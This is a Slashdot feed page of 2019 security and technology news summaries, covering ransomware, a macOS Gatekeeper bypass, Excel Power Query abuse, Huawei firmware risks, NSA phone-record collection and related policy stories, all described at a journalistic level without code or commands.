Slashdot security articles

Syndicate content Slashdot: Generated for TarPitt (217247)
News for nerds, stuff that matters: Generated for TarPitt (217247)
Updated: 20 min 8 sec ago

Florida City Fires IT Employee After Paying Ransom Demand Last Week

Mon, 07/01/2019 - 17:25
Officials from Lake City, Florida, have fired an IT employee last week after the city was forced to approve a gigantic ransomware payment of nearly $500,000 last Monday. The employee, whose name was not released, was fired on Friday, according to local media reports, who cited the Lake City mayor. ZDNet reports: Lake City's IT network was infected with malware on June 10. The city described the incident as a "triple threat." In reality, an employee opened a document they received via email, which infected the city's network with the Emotet trojan, which later downloaded the TrickBot trojan, and later, the Ryuk ransomware. The latter spread to the city's entire IT network and encrypted files. Hackers eventually demanded a ransom to let the city regain access to its systems. The city's leadership approved a ransom payment last Monday, which was paid the next day, on Tuesday. The city's IT staff started decrypting files on the same day.

Germany To Publish Standard on Modern Secure Browsers

Mon, 07/01/2019 - 12:01
Germany's cyber-security agency is working on a set of minimum rules that modern web browsers must comply with in order to be considered secure. From a report: The new guidelines are currently being drafted by the German Federal Office for Information Security (or the Bundesamt fur Sicherheit in der Informationstechnik -- BSI), and they'll be used to advise government agencies and companies from the private sector on what browsers are safe to use. A first version of this guideline was published in 2017, but a new standard is being put together to account for improved security measures added to modern browsers, such as HSTS, SRI, CSP 2.0, telemetry handling, and improved certificate handling mechanisms -- all mentioned in a new draft released for public debate last week. According to the BSI's new draft, to be considered "secure," a modern browser must follow the following requirements, among others: Must support TLS, must have a list of trusted certificates, must support extended validation (EV) certificates, must verify loaded certificates against a Certification Revocation List (CRL) or an Online Certificate Status Protocol (OCSP); the browser must use icons or color highlights to show when communications to a remote server is encrypted or in plaintext, connections to remote websites running on expired certificates must be allowed only after specific user approval; must support HTTP Strict Transport Security (HSTS) (RFC 6797). Further reading: Germany and the Netherlands To Build the First Ever Joint Military Internet.

Linux Usage on Azure Has Surpassed Windows, Microsoft Developer Reveals

Mon, 07/01/2019 - 08:00
An anonymous reader shares a report: Three and a half years ago, Mark Russinovich, Azure CTO, Microsoft's cloud, said, "One in four [Azure] instances are Linux." Next, in 2017, Microsoft revealed that 40% of Azure virtual machines (VM) were Linux-based. Then in the fall of 2018, Scott Guthrie, Microsoft's executive VP of the cloud and enterprise group, told me in an exclusive interview, "About half Azure VMs are Linux". Now, Sasha Levin, Microsoft Linux kernel developer, in a request that Microsoft be allowed to join a Linux security list, revealed that "the Linux usage on our cloud has surpassed Windows." Shocking you say? Not really. Linux is largely what runs enterprise computing both on in-house servers and on the cloud. Windows Server has been declining for years. In the most recent IDC Worldwide Operating Systems and Subsystems Market Shares report covering 2017, Linux had 68% of the market. Its share has only increased since then.

An Automation Tipping Point? The Rise of 'Robotics as a Service'

Sun, 06/30/2019 - 17:34
"Robotics-as-a-service (RaaS) is about to eat the world of work" argues Hooman Radfar, a partner at the startup studio Expa who's been "actively investing in and looking for new companies" catalyzing the change." Companies buy massive robots and software solutions that are customized -- at great cost -- to their specific needs. The massive conglomerates that sell these robots have dominated the field for decades, but that is about to change. One major factor driving this change is how dramatically globalization has reduced hardware production costs and capabilities. At the same time, cheap and powerful computing and cloud infrastructure are now also readily available and easy to spin up. As a result, vertical-specific, robotic-powered, solutions can today be offered as variable cost services versus being sold at a fixed cost. Just as cable companies include the costs of set-top boxes in their monthly bill, robots and their associated software will be bundled together and sold in a subscription package. This change to the robotics business model will have profound implications, radically transforming markets and at the same time changing the future of work. With a new variable cost model in place as a result of subscription packages, it's simple to calculate when a market is about to tip to favor RaaS. A market has hit its automation tipping point when an RaaS solution is introduced with a unit cost that is less than or equal to the unit cost for humans-in-the-loop to conduct the same task... One market that has already reached its automation tipping point is the enterprise building security market... Crop dusting ($70 billion), industrial cleaning ($78 billion), warehouse management ($21 billion), and many more service markets are tipping. When these sectors hit their automation tipping point, we will see the same level of industry disruption currently taking place in the building security market. The changes taking place in the enterprise will also deeply impact consumer markets, and ultimately society, in profound and potentially challenging ways. We are at the start of a massive shift in how work gets done. One study predicted the worldwide RaaSS market would be $34.7 within three years, according to the article, which also explores how the building security market is already being disrupted. "Instead of manning a building with three to four people, you can have one human managing a few remote robots" -- at a cost that's 30% cheaper. "Moreover, all the data and insights collected via these robots is organized and made available for building and security optimization. It isn't just cheaper, it's better. There's no turning back -- this market has hit its automation tipping point."

Ask Slashdot: What's Your 'Backup' Browser?

Sun, 06/30/2019 - 15:34
Slashdot's gotten over 17,000 votes in its poll about which web browser people use on their desktop. (The current leader? Firefox, with 53% of the vote, followed by Chrome with 30%.) But Slashdot reader koavf asks an interesting follow-up question: "What's everyone's go-to Plan B browser and why?" To start the conversation, here's how James Gelinas (a contributor at Kim Komando's tech advice site) recently reviewed the major browsers: He calls Chrome "a safe, speedy browser that's compatible with nearly every page on the internet" but also says that Chrome "is notorious as a resource hog, and it can drastically slow your computer down if you have too many tabs open." "Additionally, the perks of having your Google Account connected to your browser can quickly turn into downsides for the privacy-minded among is. If you're uncomfortable with your browser knowing your searching and spending behaviors, Chrome may not be the best choice for you." He calls Firefox "the choice for safety". "Predating Chrome by 6 years, Firefox was the top choice for savvy Netizens in the early Aughts. Although Chrome has captured a large segment of its user base, that doesn't mean the Fox is bad. In fact, Mozilla is greatly appreciated by fans and analysts for its steadfast dedication to user privacy... Speedwise, Firefox isn't a slouch either. The browser is lighter weight than Chrome and is capable of loading some websites even faster." He calls Apple's Safari and Microsoft Edge "the default choice...because both of these browsers come bundled with new computers." "Neither one has glaring drawbacks, but they tend to lack some of the security features and extensions found in more popular browsers. Speedwise, however, both Edge and Safari are able to gain the upper hand against their competition. When it comes to startup time and functions, the apps are extremely lightweight on your system's resources. This is because they're part of the Mac and Window's operating systems, respectively, and are optimized for performance in that environment." Finally, he gives the Tor browser an honorable mention. ("It's still one of the best anonymous web browsers available. It's so reliable, in fact, that people living under repressive governments often turn to it for their internet needs -- installing it on covert USB sticks to use on public computers.") And he awards a "dishonorable mention" to Internet Explorer. ("Not only is the browser no longer supported by Microsoft, but it's also vulnerable to a host of malware and adware threats.") But what do Slashdot's readers think? Putting aside your primary desktop browser -- what's your own go-to "Plan B" web browser, and why? Leave your best answers in the comments. What's your "backup" browser?

Linus Torvalds Sees Lots of Hardware Headaches Ahead

Sun, 06/30/2019 - 07:34
Linux founder Linus Torvalds "warns that managing software is about to become a lot more challenging, largely because of two hardware issues that are beyond the control of DevOps teams," reports An anonymous reader shares their report about Torvalds remarks at the KubeCon + CloudNative + Open Source Summit China conference: The first, Torvalds said, is the steady stream of patches being generated for new cybersecurity issues related to the speculative execution model that Intel and other processor vendors rely on to accelerate performance... Each of those bugs requires another patch to the Linux kernel that, depending on when they arrive, can require painful updates to the kernel, Torvalds told conference attendees. Short of disabling hyperthreading altogether to eliminate reliance on speculative execution, each patch requires organizations to update both the Linux kernel and the BIOS to ensure security. Turning off hyperthreading eliminates the patch management issue, but also reduces application performance by about 15 percent. The second major issue hardware issue looms a little further over the horizon, Torvalds said. Moore's Law has guaranteed a doubling of hardware performance every 18 months for decades. But as processor vendors approach the limits of Moore's Law, many developers will need to reoptimize their code to continue achieving increased performance. In many cases, that requirement will be a shock to many development teams that have counted on those performance improvements to make up for inefficient coding processes, he said.

Nokia's CTO Accuses Huawei of Both 'Sloppiness' and 'Real Obfuscation'

Sun, 06/30/2019 - 06:34
Nokia's CTO Marcus Weldon "told the BBC that the UK should be wary of using the Chinese hardware" -- though Nokia rushed to assure the BBC that Weldon's remarks do "not reflect the official position of Nokia." Forbes reports: On the security front, Weldon referred to analysis suggesting Huawei equipment was far more likely to have vulnerabilities than technology from Nokia or Ericsson. "We read those reports and we think okay, we're doing a much better job than they are," Weldon said, describing Huawei's failings as serious and claiming Nokia's alternatives to be a safer bet. "Some of it seems to be just sloppiness, honestly, that they haven't patched things, they haven't upgraded. But some of it is real obfuscation, where they make it look like they have the secure version when they don't...." The comments from Nokia's CTO came in light of research from Finite State, which published a scathing report claiming that "Huawei devices quantitatively pose a high risk to their users. In virtually all categories we examined, Huawei devices were found to be less secure than those from other vendors making similar devices." And this included the potential backdoors that lie at the heart of the U.S. government's security case against the Chinese company. "Out of all the firmware images analyzed, 55% had at least one potential backdoor," Finite State found. "These backdoor access vulnerabilities allow an attacker with knowledge of the firmware and/or with a corresponding cryptographic key to log into the device." Nokia's later statement insisted that their company "is focused on the integrity of its own products and services and does not have its own assessment of any potential vulnerabilities associated with its competitors."

Sting Finds Ransomware Data Recovery Firms Are Just Paying The Ransom

Sat, 06/29/2019 - 23:34
"ProPublica recently reported that two U.S. firms, which professed to use their own data recovery methods to help ransomware victims regain access to infected files, instead paid the hackers. Now there's new evidence that a U.K. firm takes a similar approach." An anonymous reader quotes their report: Fabian Wosar, a cyber security researcher, told ProPublica this month that, in a sting operation he conducted in April, Scotland-based Red Mosquito Data Recovery said it was "running tests" to unlock files while actually negotiating a ransom payment. Wosar, the head of research at anti-virus provider Emsisoft, said he posed as both hacker and victim so he could review the company's communications to both sides. Red Mosquito Data Recovery "made no effort to not pay the ransom" and instead went "straight to the ransomware author literally within minutes," Wosar said. "Behavior like this is what keeps ransomware running." Since 2016, more than 4,000 ransomware attacks have taken place daily, or about 1.5 million per year, according to statistics posted by the U.S. Department of Homeland Security. Law enforcement has failed to stem ransomware's spread, and culprits are rarely caught... But clients who don't want to give in to extortion are susceptible to firms that claim to have their own methods of decrypting files. Often, victims are willing to pay more than the ransom amount to regain access to their files if they believe the money is going to a data recovery firm rather than a hacker, Wosar said. Red Mosquito charged their client four times the actual ransom amount, according to the report -- though after ProPublica followed up, the company "did not respond to emailed questions, and hung up when we called the number listed on its website." The company then also "removed the statement from its website that it provides an alternative to paying hackers. It also changed 'honest, free advice' to 'simple free advice,' and the 'hundreds' of ransomware cases it has handled to 'many.'"

AMD Cites 'Factual Errors', 'Omissions' in Critical Report on Its China Venture

Sat, 06/29/2019 - 15:34
Thursday the Wall Street Journal wrote a piece about AMD's joint venture with Chinese holding coming THATIC -- titled "How a Big U.S. Chip Maker Gave China the 'Keys to the Kingdom'." The article argues that AMD "essentially granted China access to advanced processor IP that could be used to threaten U.S. national security," reports Forbes. But they add that the same day, AMD executive Harry Wolin wrote an angry blog post in response, complaining that the story "contains several factual errors and omissions and does not portray an accurate picture." Forbes reports: From Wolin's post, "Starting in 2015, AMD diligently and proactively briefed the Department of Defense, the Department of Commerce and multiple other agencies within the U.S. Government before entering into the joint ventures. AMD received no objections whatsoever from any agency to the formation of the joint ventures or to the transfer of technology -- technology which was of lower performance than other commercially available processors. In fact, prior to the formation of the joint ventures and the transfer of technology, the Department of Commerce notified AMD that the technology proposed was not restricted or otherwise prohibited from being transferred. Given this clear feedback, AMD moved ahead with the joint ventures." Not only does AMD claim it had the green light from multiple government entities to enter into the deal, the post claims that the WSJ article is simply wrong. "The Wall Street Journal story omits important factual details, including the fact that AMD put significant protections in place to protect its intellectual property (IP) and prevent valuable IP from being misused or reverse engineered to develop future generations of processors."

Microsoft Claims Unauthorized Repairing of Its Devices Would Be a Security Risk

Sat, 06/29/2019 - 11:41
In comments submitted to America's Federal Trade Commission, Microsoft says repairing its devices could jeopardize protections from the Trusted Platform Module (TPM) security chip. "Don't believe them," argues a group of information security professionals who support the right to repair. Slashdot reader chicksdaddy quotes their report: The statement was submitted ahead of Nixing the Fix, an FTC workshop on repair restrictions that is scheduled for mid-July... "The unauthorized repair and replacement of device components can result in the disabling of key hardware security features or can impede the update of firmware that is important to device security or system integrity," Microsoft wrote... "If the TPM or other hardware or software protections were compromised by a malicious or unqualified repair vendor, those security protections would be rendered ineffective and consumers' data and control of the device would be at risk. Moreover, a security breach of one device can potentially compromise the security of a platform or other devices connected to the network...." As we know: Firms like Microsoft, Lexmark, LG, Samsung and others use arguments like this all the time and then not too subtly imply that their authorized repair professionals are more trustworthy and honest than independent competitors. But that's just hot air. They have no data to back up those assertions and there's no way that their repair technicians are more trustworthy than owners, themselves... There's nothing inherent in repair or the things called for in right to repair laws like providing diagnostic software, diagnostic codes, schematics and replacement parts that puts the integrity of the TPM or the trust model it anchors at risk. Nor does the TPM require that the devices it secures remain pristine: using the same hardware and software configuration as when they were sold by the OEM. After all, TPMs are in Dell computers. Dell makes diagnostic software and diagnostic codes and schematics available for their hardware and I haven't heard Microsoft or anybody else suggest that a TPM on a repairable Dell laptop is any less secure than the TPM on an unrepairable Microsoft Surface.

Trump Relaxes US Ban On Selling To Huawei In Surprise G20 Concession

Sat, 06/29/2019 - 09:34
hackingbear tipped us off to a breaking news story. CNN reports: US President Donald Trump has appeared to soften his tone on Chinese communications giant Huawei, suggesting that he would allow the company to once again purchase U.S. technology. Speaking at a press conference in Osaka, Saturday, Trump said that the U.S. sells a "tremendous amount of product" to Huawei. "That's okay, we will keep selling that product," said Trump. "The (U.S.) companies were not exactly happy that they couldn't sell." Forbes points out "While it's not a lifting of the blanket ban, it will significantly benefit the Chinese manufacturer." ZDNet reports: This news just broke with comments made by Trump, including "U.S. companies can sell their equipment to Huawei. We're talking about equipment where there's no great national security problem with it." The details of this statement are still pending, but it is likely that 5G infrastructure equipment may still not be part of this access deal while the smartphone segment may be where we see open access. One Daily Beast contributor argues the action "appears to be a surrender to publicly issued Chinese demands." But TechCrunch writes that "any mutual trust has been broken and things are unlikely to be the same again."

New Mac Malware Abuses Recently Disclosed Gatekeeper Zero-Day

Sat, 06/29/2019 - 02:00
puddingebola writes: In May, security researcher Filippo Cavallarin made public a vulnerability in macOS's Gatekeeper. The vulnerability can allow an attacker to use a symlink and an NFS server to bypass Gatekeepers authentication and run malicious code. The malware has been named OSX/Linker and has been tied to the same group that operates the OSX/Surfbuyer adware. All macOS versions are affected, including the latest 10.14.5, and Apple has yet to release a patch to this day, a full month after Cavallarin's public disclosure.

Italy Stings Facebook With $1.1 Million Fine For Cambridge Analytica Data Misuse

Fri, 06/28/2019 - 18:02
Italy's data protection watchdog has slapped Facebook with a $1.1 million fine for violations of local privacy law attached to the Cambridge Analytica data misuse scandal. TechCrunch reports: Last year it emerged that up to 87 million Facebook users had had their data siphoned out of the social media giant's platform by an app developer working for the controversial (and now defunct) political data company, Cambridge Analytica. The offences in question occurred prior to Europe's tough new data protection framework, GDPR, coming into force -- hence the relatively small size of the fine in this case, which has been calculated under Italy's prior data protection regime. (Whereas fines under GDPR can scale as high as 4% of a company's annual global turnover.) A Facebook spokesperson issued the following statement: "We have said before that we wish we had done more to investigate claims about Cambridge Analytica in 2015. However, evidence indicates that no Italian user data was shared with Cambridge Analytica. Dr Kogan only shared data with Cambridge Analytica in relation to U.S. users. We made major changes to our platform back then and have also significantly restricted the information which app developers can access. We're focused on protecting people's privacy and have invested in people, technology and partnerships, including hiring more than 20,000 people focused on safety and security over the last year. We will review the Garante's decision and will continue to engage constructively with their concerns."

NSA Improperly Collected US Phone Call Data After Saying Problem Was Fixed

Fri, 06/28/2019 - 14:40
An anonymous reader quotes a report from USA Today: The National Security Agency improperly collected phone call records of Americans last fall, months after a previous breach that compelled the agency to destroy millions of records from the contentious program, documents released Wednesday revealed. The redacted documents, obtained by the ACLU in a Freedom of Information Act lawsuit, do not indicate how many records NSA improperly collected in the October breach, nor which telecommunications provider submitted the improper data. "These documents provide further evidence that the NSA has consistently been unable to operate the call detail record program within the bounds of the law," the ACLU said in a letter to Congress this week lobbying for an end to the program. The letter says elements within the Office of the Director of National Intelligence concluded the October violations had a "significant impact" on privacy and civil rights, but that the Americans affected were not told of the breach.

Firefox To Get a Random Password Generator, Like Chrome and Safari

Fri, 06/28/2019 - 14:00
Mozilla is adding a random password generator to Firefox. From a report: The Firefox random password generator is expected to become publicly available for all Firefox users with the release of Firefox 69, scheduled for release in early September, roughly a year after Chrome 69. Currently, the random password generator is only available in Firefox Nightly, a Firefox version for testing new features before they land in the stable branch. When Firefox 69 will be released, the random password generator is expected to be available as a checkbox in the Firefox settings section, under "Privacy & Security," under "Logins and Passwords."

FBI Urges Universities To Monitor Some Chinese Students And Scholars In the US

Fri, 06/28/2019 - 12:01
U.S. intelligence agencies are encouraging American research universities to develop protocols for monitoring students and visiting scholars from Chinese state-affiliated research institutions, as U.S. suspicion toward China spreads to academia. From a report: Since last year, FBI officials have visited at least 10 members of the Association of American Universities, a group of 62 research universities, with an unclassified list of Chinese research institutions and companies. Universities have been advised to monitor students and scholars associated with those entities on American campuses, according to three administrators briefed at separate institutions. FBI officials have also urged universities to review ongoing research involving Chinese individuals that could have defense applications, the administrators say. "We are being asked what processes are in place to know what labs they are working at or what information they are being exposed to," Fred Cate, vice president of research at Indiana University, tells NPR. "It's not a question of just looking for suspicious behavior -- it's actually really targeting specific countries and the people from those countries." In a statement responding to NPR's questions, the FBI said it "regularly engages with the communities we serve. As part of this continual outreach, we meet with a wide variety of groups, organizations, businesses, and academic institutions. The FBI has met with top officials from academia as part of our ongoing engagement on national security matters."

Microsoft Seeks To Join the Official Linux-Distros Mailing List

Fri, 06/28/2019 - 11:21
Microsoft's transformation into a fully paid-up member of the Linux love-train continued this week as the Windows giant sought to join the exclusive club that is the official linux-distros mailing list. From a report: The purpose of the linux-distros list is used by Linux distributions to privately report, coordinate, and discuss security issues yet to reach the general public; oss-security is there for stuff that is already out in the open or cannot wait for things to bounce around for a few days first. Sasha Levin, who describes himself as a "Linux kernel hacker" at the beast of Redmond, made the application for his employer to join the list, which if approved would allow Microsoft to tap into private behind-the-scenes chatter about vulnerabilities, patches, and ongoing security issues with the open-source kernel and related code. These discussions are crucial for getting an early heads up, and coordinating the handling and deployment of fixes before they are made public. To demonstrate that Microsoft qualifies for membership alongside the likes of Ubuntu, Debian, and SUSE, he cited Microsoft's Azure Sphere and the Windows Subsystem For Linux (WSL) 2 as examples of distro-like builds.

FDA Warns About Insulin Pump Cybersecurity

Fri, 06/28/2019 - 08:41
Something new for diabetes patients to worry about: Someone nearby could potentially connect wirelessly to your Medtronic MiniMed insulin pump, the FDA warned yesterday. From a report: While the agency said that, as far as it knows, no one has actually hacked into someone else's insulin pump and harmed them, this is the future of health care cyber risk. They could then change the pump's settings, causing it to deliver too much or too little insulin to the patient. The agency said that patients using certain models of the pump should switch to less vulnerable ones.

Trump White House Reportedly Debating Encryption Policy Behind Closed Doors

Thu, 06/27/2019 - 18:02
According to a report in Politico, the Trump administration held a National Security Council meeting on Wednesday that weighed the challenges and benefits of encryption. "One of Politico's sources said that the meeting was split into two camps: Decide, create and publicize the administration's position on encryption or go so far as to ask Congress for legislation to ban end-to-end encryption," reports Gizmodo. From the report: That would be a huge escalation in the encryption fight and, moreover, would probably be unsuccessful due to a lack of willpower in Congress. No decision was made by the Trump administration officials, Politico reported. The White House did not respond to a request for comment. The fact that these discussions are ongoing both within the White House and with Silicon Valley shows that the issue is still very much alive within the corridors of power.

Microsoft Excel Power Query Feature Can Be Abused For Malware Distribution

Thu, 06/27/2019 - 17:25
Security researchers have devised a method to abuse a legitimate Microsoft Excel technology named Power Query to run malicious code on users' systems with minimal interaction. ZDNet reports: Power Query is a data connection technology that can allow Excel files to discover, connect, combine, and manipulate data before importing it from remote sources, such as an external database, text document, another spreadsheet, or a web page. The tool is included with recent versions of Excel and available as a separate downloadable add-in for older Excel versions. In research published today and shared with ZDNet, Ofir Shlomo, a security researcher with the Mimecast Threat Center, described a technique through which Power Query features could be abused to run malicious code on users' systems. The technique relies on creating malformed Excel documents that use Power Query to import data from an attacker's remote server. "Using Power Query, attackers could embed malicious content in a separate data source, and then load the content into the spreadsheet when it is opened," Shlomo said. "The malicious code could be used to drop and execute malware that can compromise the user's machine." Mimecast's technique can even bypass security sandboxes that analyze documents sent via email before allowing users to download and open them. Microsoft has yet to issue a fix for the vulnerability, but did release an advisory document for users, offering a way to beef up security.